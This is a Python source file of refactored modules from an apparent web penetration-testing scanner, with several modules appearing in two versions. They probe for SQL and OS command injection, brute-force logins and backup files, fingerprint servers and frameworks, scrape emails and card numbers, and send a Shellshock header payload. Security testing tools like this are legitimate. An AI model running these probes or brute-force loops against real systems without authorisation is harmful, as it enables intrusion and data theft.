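 def module_run(self):
     """Probe the request parameters for OS command injection by marker reflection.

     Each wordlist line is a command template whose ``[PAYLOAD]`` placeholder
     is replaced with a fresh random marker; ``Replace`` substitutes the
     template into the URL (GET) or the URL and body (POST).  A response whose
     body contains the marker is reported once and the scan stops.

     Options read: host, port, data, method, url_path, wordlist.  The
     ``headers`` and ``status`` options were read by the original but never
     used, so they are not read here.
     """
     path = os.path.join(self.data_path, 'os_command_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     # ('' or None) collapses to None, so an empty wordlist option used to be
     # handed straight to readfile(); treat '' like "unset".
     wordlist = self.options['wordlist'] or path
     url = check_url(check_end(host, url_path), port)
     for payload in readfile(wordlist):
         # A fresh marker per template keeps an earlier reflection from being
         # mistaken for a hit on the current one.
         marker = rand_all(20)
         payload = payload.replace('[PAYLOAD]', marker)
         # rand_all's alphabet is not visible here; escape so the marker is
         # searched literally even if it contains regex metacharacters.
         marker_re = re.escape(marker)
         if method == 'GET':
             for probe_url in Replace(url, payload, data).run():
                 print(probe_url)  # echo each probed URL, as before
                 resp = self.request(url=probe_url, method=method, data=data)
                 if re.search(marker_re, resp.content, re.I):
                     plus('OS Command Vulnerability was found: %s' % (resp.url))
                     return
         elif method == 'POST':
             # Replace.run() is evaluated once (assumed deterministic — TODO
             # confirm); entry 0 is the URL, the rest are candidate bodies.
             variants = Replace(url, payload, data).run()
             for probe_url in variants[:1]:
                 # Distinct loop name: the original rebound ``data`` here, so
                 # every later payload was built from an already-injected
                 # body instead of the configured one.
                 for body in variants[1:]:
                     resp = self.request(url=probe_url, method=method, data=body)
                     if re.search(marker_re, resp.content, re.I):
                         plus('OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s' % (resp.url, body))
                         return
         else:
             return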
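 def module_run(self):
     """Probe the request parameters with SQL payloads and look for DBMS error text.

     Every wordlist line is substituted into the URL (GET) or the URL and body
     (POST) by ``Replace``; ``sql_error`` is asked whether the response body
     contains a recognisable database error (it returns a DBMS name and the
     error text).  The first hit is reported and the scan stops.
     """
     path = os.path.join(self.data_path, 'sql_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     # ('' or None) collapses to None, so an empty wordlist option used to be
     # handed straight to readfile(); treat '' like "unset".
     wordlist = self.options['wordlist'] or path
     url = check_url(check_end(host, url_path), port)
     for payload in readfile(wordlist):
         if method == 'GET':
             for probe_url in Replace(url, payload, data).run():
                 resp = self.request(url=probe_url, method=method, data=data)
                 name, error = sql_error(resp.content)
                 if name and error:
                     plus('SQL Injection was found: %s' % (resp.url))
                     print(' \_ DBMS => %s\n \_ ERROR => %s' % (name, error))
                     return
         elif method == 'POST':
             # Replace.run() is evaluated once (assumed deterministic — TODO
             # confirm); entry 0 is the URL, the rest are candidate bodies.
             variants = Replace(url, payload, data).run()
             for probe_url in variants[:1]:
                 # Distinct loop name: the original rebound ``data`` here, so
                 # every later payload was built from an already-injected
                 # body instead of the configured one.
                 for body in variants[1:]:
                     resp = self.request(url=probe_url, method=method, data=body)
                     name, error = sql_error(resp.content)
                     if name and error:
                         plus('SQL Injection was found: %s' % (resp.url))
                         print(' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s' % (body, name, error))
                         return
         else:
             return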
 def module_run(self):
     """Enqueue one request per wordlist entry appended to the base URL.

     The wordlist path is validated with ``self.check``; each line is joined
     to the base URL via ``check_end`` and handed to ``self.thread`` together
     with the configured method (``self.thread`` is defined elsewhere in the
     class).
     """
     test('Starting bruteforce...')
     opts = self.options
     base_url = check_url(check_end(opts['host'], opts['url_path']), opts['port'])
     method = opts['method']
     for entry in readfile(self.check(opts['wordlist'])):
         self.thread(check_end(base_url, entry), method)
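 def module_run(self):
     """Report the first ``server`` response header the target returns.

     A fixed list of request methods is tried in order (the non-standard
     'BLABLA' entry is presumably meant to elicit an error response — not
     verifiable here) and the scan stops at the first response that carries a
     ``server`` header.
     """
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     for m in ['GET', 'HEAD', 'BLABLA', 'OPTIONS', 'DELETE']:
         resp = self.request(url=url, method=m)
         # Membership on the mapping itself; the original used .keys() and
         # mixed tabs with spaces in this loop body.
         if 'server' in resp.headers:
             plus('Detect Server: %s' % (resp.headers['server']))
             return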
 def module_run(self):
     """Enqueue one request per (user, password) pair from the two wordlists.

     Both wordlist paths go through ``self.check``; the password file is
     re-read (and re-checked) for every user.  ``self.thread`` issues the
     request and is defined elsewhere in the class.
     """
     test('Starting bruteforce...')
     opts = self.options
     url = check_url(check_end(opts['host'], opts['url_path']), opts['port'])
     method = opts['method']
     password_list = opts['wpass']
     user_list = opts['wuser']
     for user in readfile(self.check(user_list)):
         for passwd in readfile(self.check(password_list)):
             self.thread(url, method, user, passwd)
 def module_run(self):
     """Try every user from ``wuser`` against every password from ``wpass``.

     Each wordlist path is validated by ``self.check`` before being read; the
     password file is read again for each user.  The actual request is made by
     ``self.thread``, defined elsewhere in the class.
     """
     test('Starting bruteforce...')
     opts = self.options
     target = check_url(check_end(opts['host'], opts['url_path']), opts['port'])
     http_method = opts['method']
     wpass = opts['wpass']
     wuser = opts['wuser']
     for username in readfile(self.check(wuser)):
         for password in readfile(self.check(wpass)):
             self.thread(target, http_method, username, password)
 def module_run(self):
     """Run each CMS fingerprint method against one response and report the first hit.

     The method named after each CMS is looked up on ``self`` and called with
     the response headers and body; a truthy result ends the scan.
     """
     test('Detecting...')
     opts = self.options
     url = check_url(check_end(opts['host'], opts['url_path']), opts['port'])
     resp = self.request(url=url, method=opts['method'], data=opts['data'])
     for cms in ('drupal', 'joomla', 'wordpress'):
         detector = getattr(self, cms)
         if detector(resp.headers, resp.content):
             plus('Found %s cms' % (cms.title()))
             return
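 def module_run(self):
     """Check whether the ASP.NET trace handler is exposed under the base URL.

     Requests ``trace.axd`` and ``Trace.axd`` below the configured path and
     reports the first 200 response whose body contains the trace page title.
     """
     test('Scanning...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     base_url = check_url(check_end(host, url_path), port)
     for path in ['trace.axd', 'Trace.axd']:
         # Build every candidate from the base URL.  The original reassigned
         # ``url`` inside the loop, so the second probe went to
         # .../trace.axd/Trace.axd instead of .../Trace.axd.
         url = check_end(base_url, path)
         resp = self.request(url=url, method=method, data=data)
         if resp.code == 200 and re.search(r'<td><h1>Application Trace</h1></td>', resp.content, re.I):
             plus('ASP.NET trace was found: %s' % (resp.url))
             return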
 def module_run(self):
     """Fingerprint the CMS from a single response.

     For each candidate name the same-named method on ``self`` is invoked with
     the response headers and body; the first truthy answer is reported and
     the scan stops.
     """
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     target = check_url(check_end(host, url_path), port)
     resp = self.request(url=target, method=method, data=data)
     candidates = ['drupal', 'joomla', 'wordpress']
     for name in candidates:
         matched = getattr(self, name)(resp.headers, resp.content)
         if not matched:
             continue
         plus('Found %s cms' % (name.title()))
         return
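 def module_run(self):
     """Report a source-code disclosure when ``source_code`` recognises one.

     ``source_code`` receives the status code and body of a single request and
     returns a flag plus the detected language; both must be truthy for a
     finding to be reported.  The ``regexp`` option is not used by this
     module.
     """
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     found, lang = source_code(resp.code, resp.content)
     # The original ended with `if bool_ is False and lang is None: return`,
     # which was dead code: the method returns here regardless.
     if found and lang:
         plus2('Code disclosure vulnerability was found in: %s' % (resp.url))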
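 def module_run(self):
     """Flag a code-disclosure finding based on ``source_code``'s verdict.

     A single request is made with the configured method and data; the
     response's status code and body are passed to ``source_code``, which
     yields a flag and a language name.  A finding is printed only when both
     are truthy.  The ``regexp`` option is read by the original but unused, so
     it is not read here.
     """
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     disclosed, lang = source_code(resp.code, resp.content)
     # Dropped the trailing `if ... is False and ... is None: return` — the
     # method falls off the end either way, so it was unreachable in effect.
     if disclosed and lang:
         plus2('Code disclosure vulnerability was found in: %s' %
               (resp.url))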
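 def module_run(self):
     """Look for an exposed ASP.NET trace page (``trace.axd`` / ``Trace.axd``).

     Each candidate name is appended to the configured base URL; a 200
     response whose body contains the trace page title is reported and the
     scan stops.
     """
     test('Scanning...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     base_url = check_url(check_end(host, url_path), port)
     trace_title = r'<td><h1>Application Trace</h1></td>'
     for path in ['trace.axd', 'Trace.axd']:
         # Derive each probe URL from the base URL; the original overwrote
         # ``url`` in the loop, so the second request targeted
         # .../trace.axd/Trace.axd rather than .../Trace.axd.
         probe_url = check_end(base_url, path)
         resp = self.request(url=probe_url, method=method, data=data)
         if resp.code != 200:
             continue
         if re.search(trace_title, resp.content, re.I):
             plus('ASP.NET trace was found: %s' % (resp.url))
             return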
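 def module_run(self):
     """Enqueue a request for every wordlist entry combined with each backup suffix.

     When the ``exts`` option is set it is passed through ``self.to_dict`` and
     used instead of the built-in suffix list.  Each wordlist line has every
     suffix appended and the result is joined to the base URL and handed to
     ``self.thread`` (defined elsewhere in the class).
     """
     test('Starting bruteforce...')
     back_ext = [
         ' (copy)/','_copy/', '- Copy/','~/','.7z',
         '.gz','.tar.gz','.tar','.tar.7z','.tar.bz2','.bak',
         '.old','.zip','.rar','.bac','_old','_bak','_backup','1','2','3'
     ]
     host = self.options['host']
     port = self.options['port']
     method = self.options['method']
     wordlist = self.options['wordlist']
     url_path = self.options['url_path']
     # Identity test for the None sentinel rather than `!= None`.
     exts = self.options['exts']
     extensions = self.to_dict(exts) if exts is not None else back_ext
     url_ = check_url(check_end(host, url_path), port)
     for dir_ in readfile(self.check(wordlist)):
         for bk in extensions:
             url = check_end(url_, dir_ + bk)
             self.thread(url, method)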
 def module_run(self):
     """Run each framework fingerprint method against one response.

     Every name in the list is resolved to a method on ``self`` and called
     with the response headers and body; the first truthy result is reported,
     using that method's docstring as the display name.  NOTE(review): the
     ``data`` and ``method`` options are read but the request is issued with
     the URL alone.
     """
     test('Detecting...')
     opts = self.options
     host = opts['host']
     port = opts['port']
     data = opts['data']
     method = opts['method']
     url_path = opts['url_path']
     resp = self.request(url=check_url(check_end(host, url_path), port))
     frameworks = ('mvc', 'cakephp', 'cherrypy', 'django', 'flask', 'fuelphp',
                   'larvel', 'grails', 'nette', 'rails', 'symfony')
     for name in frameworks:
         detector = getattr(self, name)
         if detector(resp.headers, resp.content):
             plus('Found %s Framework' % (detector.__doc__))
             return
 def module_run(self):
     """Identify the web framework from a single response.

     The same-named method on ``self`` is invoked for each candidate with the
     response headers and body; the first one that answers truthy is reported
     by its docstring and the scan ends.  NOTE(review): ``data`` and ``method``
     are read from the options but not passed to ``self.request``.
     """
     test('Detecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     target = check_url(check_end(host, url_path), port)
     resp = self.request(url=target)
     candidates = [
         'mvc', 'cakephp', 'cherrypy', 'django', 'flask',
         'fuelphp', 'larvel', 'grails', 'nette', 'rails', 'symfony',
     ]
     for candidate in candidates:
         probe = getattr(self, candidate)
         matched = probe(resp.headers, resp.content)
         if not matched:
             continue
         plus('Found %s Framework' % (probe.__doc__))
         return
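 def module_run(self):
     """Test the request parameters for OS command injection via marker reflection.

     For every wordlist template the ``[PAYLOAD]`` placeholder is swapped for a
     new random marker and ``Replace`` substitutes the template into the URL
     (GET) or URL and body (POST).  The first response that echoes the marker
     is reported and the scan stops.

     The ``headers`` and ``status`` options were read but unused in the
     original and are not read here.
     """
     path = os.path.join(self.data_path, 'os_command_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     # `!= ('' or None)` only ever compared against None, so an empty wordlist
     # option reached readfile(); '' now falls back to the bundled list.
     wordlist = self.options['wordlist'] or path
     url = check_url(check_end(host, url_path), port)
     for payload in readfile(wordlist):
         marker = rand_all(20)
         payload = payload.replace('[PAYLOAD]', marker)
         # rand_all's alphabet is unknown here; search the marker literally.
         marker_re = re.escape(marker)
         if method == 'GET':
             for probe_url in Replace(url, payload, data).run():
                 print(probe_url)  # kept: the original echoes each URL
                 resp = self.request(url=probe_url, method=method, data=data)
                 if re.search(marker_re, resp.content, re.I):
                     plus('OS Command Vulnerability was found: %s' %
                          (resp.url))
                     return
         elif method == 'POST':
             # One Replace.run() call (assumed deterministic — TODO confirm):
             # entry 0 is the URL, the remaining entries are bodies.
             variants = Replace(url, payload, data).run()
             for probe_url in variants[:1]:
                 # The original looped with `for data in data_`, clobbering
                 # the configured body for every subsequent payload.
                 for body in variants[1:]:
                     resp = self.request(url=probe_url,
                                         method=method,
                                         data=body)
                     if re.search(marker_re, resp.content, re.I):
                         plus(
                             'OS Command Vulnerability was found:\n \_ URL => %s\n \_ DATA => %s'
                             % (resp.url, body))
                         return
         else:
             return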
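 def module_run(self):
     """Search one response body for payment-card number patterns.

     Without a ``regexp`` option the built-in patterns are applied and every
     match is printed per issuer; otherwise the user-supplied expression is
     searched and its matches printed.  A malformed expression is reported via
     ``warn`` instead of propagating.
     """
     # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
     # NOTE(review): these patterns are anchored with ^/$ and searched without
     # re.M, so they match only when the whole body is a single number; and
     # '[34|37]' is a character class, not the alternation 34|37.  Left as-is
     # so the module's matching behaviour is unchanged.
     cc_regex = {
         'American Express': r'^[34|37][0-9]{14}$',
         'Mastercard':
         r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
         'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$',
         'Visa Master Card':
         r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$'
     }
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     try:
         # `== ('' or None)` only tested for None, so an empty regexp option
         # fell through to re.findall('') which matches at every offset.
         if not regexp:
             found_any = False
             for issuer, pattern in cc_regex.items():
                 for match in re.findall(pattern, resp.content, re.I):
                     found_any = True
                     print('%s => %s' % (issuer, match))
             if not found_any:
                 info('Not found credit cards...')
         else:
             found_cc = re.findall(regexp, resp.content, re.I)
             if found_cc:
                 for match in found_cc:
                     # The original printed the undefined name ``x`` here
                     # (NameError on the first match).
                     print('Found REGEX => %s' % (match))
             else:
                 info('Not found credit cards...')
     except re.error as e:
         # str(e) works on Python 2 and 3; e.message is Python 2 only.
         warn(str(e))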
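 def module_run(self):
     """Substitute SQL payloads into the request and watch for DBMS error text.

     Each wordlist line goes through ``Replace`` to produce the URL (GET) or
     URL and body (POST) variants; ``sql_error`` inspects every response body
     and returns a DBMS name plus error text when it recognises one.  The
     first finding is reported and the scan stops.
     """
     path = os.path.join(self.data_path, 'sql_injection.galileo')
     test('Injecting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     # `!= ('' or None)` only ever compared against None, so an empty wordlist
     # option reached readfile(); '' now falls back to the bundled list.
     wordlist = self.options['wordlist'] or path
     url = check_url(check_end(host, url_path), port)
     for payload in readfile(wordlist):
         if method == 'GET':
             for probe_url in Replace(url, payload, data).run():
                 resp = self.request(url=probe_url, method=method, data=data)
                 name, error = sql_error(resp.content)
                 if name and error:
                     plus('SQL Injection was found: %s' % (resp.url))
                     print(' \_ DBMS => %s\n \_ ERROR => %s' %
                           (name, error))
                     return
         elif method == 'POST':
             # One Replace.run() call (assumed deterministic — TODO confirm):
             # entry 0 is the URL, the remaining entries are bodies.
             variants = Replace(url, payload, data).run()
             for probe_url in variants[:1]:
                 # The original looped with `for data in data_`, clobbering
                 # the configured body for every subsequent payload.
                 for body in variants[1:]:
                     resp = self.request(url=probe_url,
                                         method=method,
                                         data=body)
                     name, error = sql_error(resp.content)
                     if name and error:
                         plus('SQL Injection was found: %s' % (resp.url))
                         print(
                             ' \_ DATA => %s\n \_ NAME => %s\n \_ ERROR => %s'
                             % (body, name, error))
                         return
         else:
             return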
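 def module_run(self):
     """Print every e-mail address found in one response body.

     The ``regexp`` option overrides the built-in pattern when set; the search
     is case-insensitive.  A malformed expression is reported via ``warn``.
     """
     # https://www.regular-expressions.info/email.html
     regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     # `!= ('' or None)` only tested for None, so an empty regexp option was
     # used as the pattern ('' matches everywhere); '' now means "default".
     regexp = self.options['regexp'] or regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     try:
         found_email = re.findall(regexp, resp.content, re.I)
         if found_email:
             for email in found_email:
                 print('Email => %s' % (email))
         else:
             info('Not found emails...')
     except re.error as e:
         # str(e) works on Python 2 and 3; e.message is Python 2 only.
         warn(str(e))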
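 def module_run(self):
     """Print every dotted-quad found in one response body.

     The ``regexp`` option overrides the built-in pattern when set.  A
     malformed expression is reported via ``warn``.
     """
     # https://www.regular-expressions.info/ip.html
     # NOTE(review): this pattern matches any dotted quad — it does not
     # restrict octet ranges or private address space, despite the
     # 'Private IP' label in the output.
     regexp_ = r'[0-9]+(?:\.[0-9]+){3}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     # `!= ('' or None)` only tested for None, so an empty regexp option was
     # used as the pattern ('' matches everywhere); '' now means "default".
     regexp = self.options['regexp'] or regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     try:
         found_ip = re.findall(regexp, resp.content, re.I)
         if found_ip:
             for ip in found_ip:
                 print('Private IP => %s' % (ip))
         else:
             info('Not found private ip...')
     except re.error as e:
         # str(e) works on Python 2 and 3; e.message is Python 2 only.
         warn(str(e))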
 def module_run(self):
     """Check whether a Shellshock-style header value is reflected in the body.

     A random marker is embedded in the probe string, which is sent in the
     User-Agent, Cookie and Referer headers of a single request.  Only a 200
     response whose body contains the marker is reported; every other outcome
     is treated as "not vulnerable" and nothing is printed.
     """
     r_str = rand_str(30)
     exploit = '() { :;}; echo; echo; echo %s' % (r_str)
     test('Exploiting...')
     opts = self.options
     url = check_url(check_end(opts['host'], opts['url_path']), opts['port'])
     headers = dict.fromkeys(['User-Agent', 'Cookie', 'Referer'], exploit)
     # request
     resp = self.request(url=url, method=opts['method'], data=opts['data'],
                         headers=headers)
     if resp.code != 200:
         return
     if re.search(r_str, resp.content, re.I):
         plus('ShellShock was found in: %s' % (resp.url))
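 def module_run(self):
     """List the e-mail addresses that appear in one response body.

     A user-supplied ``regexp`` replaces the built-in pattern when set; the
     search is case-insensitive and a malformed expression is reported via
     ``warn`` rather than raised.
     """
     # https://www.regular-expressions.info/email.html
     regexp_ = r'[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     # The original's `!= ('' or None)` reduced to `!= None`, so an empty
     # option became the pattern '' (matches at every offset).
     regexp = self.options['regexp'] or regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     try:
         matches = re.findall(regexp, resp.content, re.I)
     except re.error as e:
         # e.message does not exist on Python 3; str(e) works on both.
         warn(str(e))
         return
     if not matches:
         info('Not found emails...')
         return
     for email in matches:
         print('Email => %s' % (email))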
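 def module_run(self):
     """List the dotted-quad strings that appear in one response body.

     A user-supplied ``regexp`` replaces the built-in pattern when set; a
     malformed expression is reported via ``warn`` rather than raised.
     """
     # https://www.regular-expressions.info/ip.html
     # NOTE(review): the default pattern accepts any four dot-separated
     # numbers; it neither bounds the octets nor limits itself to private
     # ranges, so the 'Private IP' label in the output is broader than it
     # suggests.
     regexp_ = r'[0-9]+(?:\.[0-9]+){3}'
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     # The original's `!= ('' or None)` reduced to `!= None`, so an empty
     # option became the pattern '' (matches at every offset).
     regexp = self.options['regexp'] or regexp_
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     try:
         matches = re.findall(regexp, resp.content, re.I)
     except re.error as e:
         # e.message does not exist on Python 3; str(e) works on both.
         warn(str(e))
         return
     if not matches:
         info('Not found private ip...')
         return
     for ip in matches:
         print('Private IP => %s' % (ip))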
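 def module_run(self):
     """Scan one response body for payment-card number patterns.

     When ``regexp`` is unset the built-in per-issuer patterns are used and
     each match is printed with its issuer; otherwise the user's expression is
     searched.  ``re.error`` from a bad expression is reported via ``warn``.
     """
     # https://stackoverflow.com/questions/9315647/regex-credit-card-number-tests
     # NOTE(review): ^/$ anchors without re.M mean each pattern can only match
     # a body that consists of exactly one number, and '[34|37]' is a
     # character class rather than 34|37.  Patterns kept verbatim so matching
     # behaviour is unchanged.
     cc_regex = {
         'American Express': r'^[34|37][0-9]{14}$',
         'Mastercard': r'^(?:5[1-5][0-9]{2}|222[1-9]|22[3-9][0-9]|2[3-6][0-9]{2}|27[01][0-9]|2720)[0-9]{12}$',
         'Visa Card': r'^4[0-9]{12}(?:[0-9]{3})?$',
         'Visa Master Card': r'^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$',
     }
     test('Searching...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     regexp = self.options['regexp']
     method = self.options['method']
     url_path = self.options['url_path']
     url = check_url(check_end(host, url_path), port)
     resp = self.request(url=url, method=method, data=data)
     try:
         if regexp:
             # Custom expression.  The original referenced an undefined ``x``
             # in this print and raised NameError on the first match.
             found_cc = re.findall(regexp, resp.content, re.I)
             if not found_cc:
                 info('Not found credit cards...')
             for match in found_cc:
                 print('Found REGEX => %s' % (match))
         else:
             # `== ('' or None)` only tested for None; '' now also selects
             # the built-in patterns instead of becoming the pattern ''.
             hit = False
             for issuer, pattern in cc_regex.items():
                 for match in re.findall(pattern, resp.content, re.I):
                     hit = True
                     print('%s => %s' % (issuer, match))
             if not hit:
                 info('Not found credit cards...')
     except re.error as e:
         # e.message is Python 2 only; str(e) is portable.
         warn(str(e))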
 def module_run(self):
     """Detect a Shellshock-style reflection with a single marked request.

     The probe string carries a random marker and is placed in the User-Agent,
     Cookie and Referer headers.  A hit is reported only for a 200 response
     whose body contains the marker; any other status, or a 200 without the
     marker, ends the check silently.
     """
     marker = rand_str(30)
     exploit = '() { :;}; echo; echo; echo %s' % (marker)
     test('Exploiting...')
     host = self.options['host']
     port = self.options['port']
     data = self.options['data']
     method = self.options['method']
     url_path = self.options['url_path']
     probe_headers = {}
     for header_name in ('User-Agent', 'Cookie', 'Referer'):
         probe_headers[header_name] = exploit
     target = check_url(check_end(host, url_path), port)
     # request
     resp = self.request(url=target, method=method, data=data,
                         headers=probe_headers)
     reflected = resp.code == 200 and re.search(marker, resp.content, re.I)
     if reflected:
         plus('ShellShock was found in: %s' % (resp.url))